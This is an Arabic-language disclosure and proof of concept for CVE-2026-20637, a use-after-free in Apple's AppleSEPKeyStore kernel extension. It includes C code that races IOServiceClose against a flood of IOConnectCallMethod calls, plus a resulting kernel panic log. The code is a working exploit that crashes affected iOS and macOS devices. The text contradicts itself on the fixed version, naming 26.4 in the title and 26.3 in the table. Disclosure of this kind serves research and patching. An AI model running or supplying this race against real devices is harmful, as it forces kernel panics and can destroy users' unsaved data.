
CVE-2026-20637: AppleSEPKeyStore Use-After-Free — ثغرة في نواة iOS/macOS (تم إصلاحها في 26.4)
CVE-2026-20637 | المؤلف: Johnny Franks (@zeroxjf)
المكوّن: AppleKeyStore
التأثير: قد يتمكن أحد التطبيقات من التسبب بإنهاء غير متوقع للنظام
الوصف: تمت معالجة مشكلة استخدام بعد التحرير (use-after-free) بتحسين إدارة الذاكرة.
| iOS | 26.1 - 26.2 (تم اختباره) |
| macOS | 26.1 - 26.2 (تم اختباره) |
| المكوّن | com.apple.driver.AppleSEPKeyStore |
| تم الإصلاح في | iOS 26.3 / iPadOS 26.3 |
ملاحظة: ربما تكون Apple قد أصلحت هذه الثغرة تدريجيًا بين 26.2.1 و26.3، لذلك قد لا تعمل على الإصدارات الوسيطة.
تُحدث هذه الـPoC حالة ذعر النواة (kernel panic) فورًا على الأجهزة المتأثرة. احفظ عملك قبل التشغيل؛ فحالات الذعر القسري المتكررة قد تُتلف البيانات غير المحفوظة.
ثغرة استخدام بعد التحرير (use-after-free) في IOCommandGate تُثار عبر سباق فتح/إغلاق في AppleKeyStore. ثماني خيوط مستدعية تُغرق IOConnectCallMethod على المحددات 0-15 بينما تتنافس أربعة خيوط مُغلِقة على IOServiceClose، مما يُنشئ نافذة يتم فيها الوصول إلى بوابة الأوامر بعد تحريرها.
#define AKS_SERVICE_NAME "AppleKeyStore"
#define NUM_CALLERS 8
#define NUM_CLOSERS 4
#define NUM_ITERATIONS 100000
static _Atomic(io_connect_t) g_conn = IO_OBJECT_NULL;
// 8 caller threads: hammer IOConnectCallMethod (high priority)
while (!done) {
io_connect_t conn = atomic_load(&g_conn);
if (conn == IO_OBJECT_NULL) continue;
for (uint32_t sel = 0; sel < 16; sel++) {
IOConnectCallMethod(conn, sel, scalars, 6, NULL, 0, NULL, NULL, NULL, NULL);
}
}
// 4 closer threads: race IOServiceClose (high priority)
while (!done) {
io_connect_t conn = atomic_load(&g_conn);
if (conn == IO_OBJECT_NULL) continue;
IOServiceClose(conn);
atomic_store(&g_conn, IO_OBJECT_NULL);
}
// Main thread: 100k connections, no delay
for (int i = 0; i < NUM_ITERATIONS; i++) {
uint32_t type = (i % 4 == 0) ? 0x2022 : (i % 4 == 1) ? 0xbeef : (i % 4 == 2) ? 0x1337 : 0x4141;
IOServiceOpen(svc, mach_task_self(), type, &conn);
atomic_store(&g_conn, conn);
// no delay: keep the close/call race window hot
}
panic(cpu 4 caller 0xfffffff015b84ae0): [iokit.IOCommandGate]: element modified after free
(off:72, val:0xfffffffffffffe00, sz:80, ptr:0xffffffe69b7d0db0)
72: 0xfffffffffffffe00
Kernel version: Darwin Kernel Version 25.1.0: Thu Oct 23 11:09:22 PDT 2025;
root:xnu-12377.42.6~55/RELEASE_ARM64_T8030
Panicked task 0xffffffe5b4f1e820: pid 956: Test
Kernel Extensions in backtrace:
com.apple.driver.AppleSEPKeyStore(2.0)[AD3CDADB-06B6-32F5-9E47-9889901353CA]
@0xfffffff016a47020->0xfffffff016a84f9f